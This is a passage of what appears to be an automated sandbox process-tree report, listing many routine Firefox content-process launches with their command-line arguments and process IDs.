    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8792 -childID 22 -isForBrowser -prefsHandle 8748 -prefMapHandle 8580 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfe5000c-af69-4c27-b336-c6cb3cc57d65} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5496
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8980 -childID 23 -isForBrowser -prefsHandle 8988 -prefMapHandle 8992 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79f08910-b5bf-44aa-8c06-6a17b055f1fd} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8980 -childID 24 -isForBrowser -prefsHandle 9168 -prefMapHandle 9176 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {465daa85-9ed4-4b23-9f87-a7de0320b2ab} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5536
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8020 -childID 25 -isForBrowser -prefsHandle 8160 -prefMapHandle 7756 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37a75b26-3d15-40aa-924e-0c31f0e37969} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5600
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6424 -childID 26 -isForBrowser -prefsHandle 7024 -prefMapHandle 7028 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9bc1ee7-ba81-4356-a2b4-7d620010fd3b} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8168 -childID 27 -isForBrowser -prefsHandle 9420 -prefMapHandle 9416 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86f66b1a-740c-4439-8e68-ef24ca79d554} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9560 -childID 28 -isForBrowser -prefsHandle 6804 -prefMapHandle 6800 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e15fafe3-7c02-4154-99cd-d6ad4dd9e64d} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5676
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9704 -childID 29 -isForBrowser -prefsHandle 9712 -prefMapHandle 9716 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c74bbde6-b948-42a3-953b-53d5b3dce235} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9896 -childID 30 -isForBrowser -prefsHandle 9904 -prefMapHandle 9908 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a2dd6b2-d77e-4cca-a1b8-e2ab7b78eb15} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5708
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7624 -childID 31 -isForBrowser -prefsHandle 10024 -prefMapHandle 10032 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2945574f-9258-4f04-822f-803a82394682} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10172 -childID 32 -isForBrowser -prefsHandle 7804 -prefMapHandle 7808 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e52cadb8-3f2a-41d4-b49b-e18ea8502624} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5736
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7596 -childID 33 -isForBrowser -prefsHandle 7588 -prefMapHandle 7352 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fdb2003-2f9a-4f34-aabd-d41674710cda} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5148
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10484 -childID 34 -isForBrowser -prefsHandle 10404 -prefMapHandle 10408 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {586d2b19-b73d-42e8-ab71-cc3bf41bfb8d} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5760
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6644 -childID 35 -isForBrowser -prefsHandle 10584 -prefMapHandle 10588 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dc7cced-9b84-48d0-a659-b3d133d9f7ad} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:4344
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10724 -childID 36 -isForBrowser -prefsHandle 10804 -prefMapHandle 10800 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {546eeb29-2d6b-4121-86a6-e9f9481fb320} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10992 -childID 37 -isForBrowser -prefsHandle 10912 -prefMapHandle 10916 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80452163-bb28-4233-8372-21df24946bb3} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5808
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10712 -childID 38 -isForBrowser -prefsHandle 11136 -prefMapHandle 11140 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c241fbf-acc7-4d20-8e2e-b9756fc419be} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5880
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11312 -childID 39 -isForBrowser -prefsHandle 11320 -prefMapHandle 11324 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f7d2f0f-457c-4706-b0ea-fb84467e5277} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5900
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11504 -childID 40 -isForBrowser -prefsHandle 11512 -prefMapHandle 11516 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {425be289-ff41-4f75-bdd1-9cabe7f1ad09} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11600 -childID 41 -isForBrowser -prefsHandle 11740 -prefMapHandle 11744 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86266eeb-6545-4a80-aeeb-2f4d2ab5d84c} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5980
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11908 -childID 42 -isForBrowser -prefsHandle 11916 -prefMapHandle 11920 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06dfd2b2-99cf-417b-8d5b-107dc60a1604} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5992
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12208 -childID 43 -isForBrowser -prefsHandle 12128 -prefMapHandle 12132 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01c6cd46-fae6-439e-b718-343d963354f1} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6016
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12340 -childID 44 -isForBrowser -prefsHandle 12416 -prefMapHandle 12412 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80e2264e-9422-4cf4-bfec-42e7805649e0} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12596 -childID 45 -isForBrowser -prefsHandle 12516 -prefMapHandle 12520 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdbd836a-081c-4b57-bd3c-c6eeb71fb546} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6044
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12808 -childID 46 -isForBrowser -prefsHandle 12728 -prefMapHandle 12732 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5be0c5ef-0e9b-41de-a08e-e2ea6214620c} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6052
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12924 -childID 47 -isForBrowser -prefsHandle 13004 -prefMapHandle 13000 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7dc2111-f992-4e7e-96ae-6016a47413ec} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13152 -childID 48 -isForBrowser -prefsHandle 13108 -prefMapHandle 12912 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06094a75-71ae-4e91-a5a7-3f0e8fe48bd9} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13324 -childID 49 -isForBrowser -prefsHandle 13332 -prefMapHandle 13336 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ac4909-c274-495f-8dd0-ba764ab3e402} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13516 -childID 50 -isForBrowser -prefsHandle 13524 -prefMapHandle 13528 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {640435bd-72be-4eb3-a940-b76a14cf748c} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13732 -childID 51 -isForBrowser -prefsHandle 13740 -prefMapHandle 13744 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {011aed0b-c5e5-451f-9f63-5c9a6ed29ee4} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:6132
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13924 -childID 52 -isForBrowser -prefsHandle 13932 -prefMapHandle 13936 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c82fd205-8687-49c8-86f7-88085f77ac85} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:1380
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14132 -childID 53 -isForBrowser -prefsHandle 14140 -prefMapHandle 14148 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e2eb892-566b-415f-8384-81a2972ed23e} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:4500
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14328 -childID 54 -isForBrowser -prefsHandle 14340 -prefMapHandle 14344 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96c12f59-7261-41d4-b283-9c1ba83b5f95} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:1028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14548 -childID 55 -isForBrowser -prefsHandle 14624 -prefMapHandle 14620 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bab51c4b-a032-49f6-8425-9584acce237a} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14744 -childID 56 -isForBrowser -prefsHandle 14700 -prefMapHandle 14532 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64523924-3986-4f14-85bc-fed91c5f389c} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:4748
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14936 -childID 57 -isForBrowser -prefsHandle 14940 -prefMapHandle 14944 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97a8495b-42b7-4343-ba73-2b9b0b15d3d2} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:2012
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15120 -childID 58 -isForBrowser -prefsHandle 15128 -prefMapHandle 15132 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af6c56c8-30f7-41d2-a6df-41c737f23ac1} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:1616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15328 -childID 59 -isForBrowser -prefsHandle 15336 -prefMapHandle 15340 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87b00d23-f140-4dd2-9eed-d5eefce7b7b3} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:764
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15508 -childID 60 -isForBrowser -prefsHandle 15516 -prefMapHandle 15520 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12049265-6ee1-430f-99d0-e927f45e90db} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:4664
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15728 -childID 61 -isForBrowser -prefsHandle 15732 -prefMapHandle 15736 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0758589f-4e7d-4305-adbd-bb50217df583} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:3800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16000 -childID 62 -isForBrowser -prefsHandle 15920 -prefMapHandle 15924 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e21c1c88-062d-48b7-a7b0-fb24582a29c3} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16200 -childID 63 -isForBrowser -prefsHandle 16120 -prefMapHandle 16128 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7ffa2d9-bdfa-47e6-a80e-00e59642c0cd} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5824
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16300 -childID 64 -isForBrowser -prefsHandle 16308 -prefMapHandle 16312 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d183ec0-baa6-4214-bee4-c38ae7b4bfe3} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5848
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16492 -childID 65 -isForBrowser -prefsHandle 16500 -prefMapHandle 16504 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {038ce9ee-378c-4ee5-9516-3e0bb6fd4266} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5860
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16684 -childID 66 -isForBrowser -prefsHandle 16692 -prefMapHandle 16696 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f69159d3-7ea7-44a3-9cec-388b3bec01c9} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=16884 -childID 67 -isForBrowser -prefsHandle 16888 -prefMapHandle 16892 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac328b06-26d6-4fbf-ab82-d7e6338a4f60} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5936
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17184 -childID 68 -isForBrowser -prefsHandle 17104 -prefMapHandle 17112 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ebb07b-30e4-4509-9463-5d3c5aab00c6} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17324 -childID 69 -isForBrowser -prefsHandle 17088 -prefMapHandle 17092 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f87fca2-dde3-4fd1-a9e2-7dfcd3faf75a} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17564 -childID 70 -isForBrowser -prefsHandle 17484 -prefMapHandle 17488 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db991373-1242-43b1-a957-f42eac4233bd} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:2384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17688 -childID 71 -isForBrowser -prefsHandle 17696 -prefMapHandle 17700 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {425e5678-8deb-4b4d-8bf6-51116d018340} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:2340
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=17564 -childID 72 -isForBrowser -prefsHandle 17912 -prefMapHandle 17920 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e3bbece-b8aa-45f0-b7e2-1a2e7a2e05fb} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18168 -childID 73 -isForBrowser -prefsHandle 18088 -prefMapHandle 18096 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc28bd55-3c22-4392-bbac-0db12b176b2b} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18180 -childID 74 -isForBrowser -prefsHandle 18356 -prefMapHandle 18352 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba203701-27b1-4843-9d2e-01412be0ae2b} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18568 -childID 75 -isForBrowser -prefsHandle 18488 -prefMapHandle 18492 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60cda70e-1a63-4598-b397-0dd7f898e242} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=18672 -childID 76 -isForBrowser -prefsHandle 18680 -prefMapHandle 18684 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa2f6649-5018-432e-b2f3-21d100be532f} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5284
- - C:\Program Files\Mozilla Firefox\firefox.exe
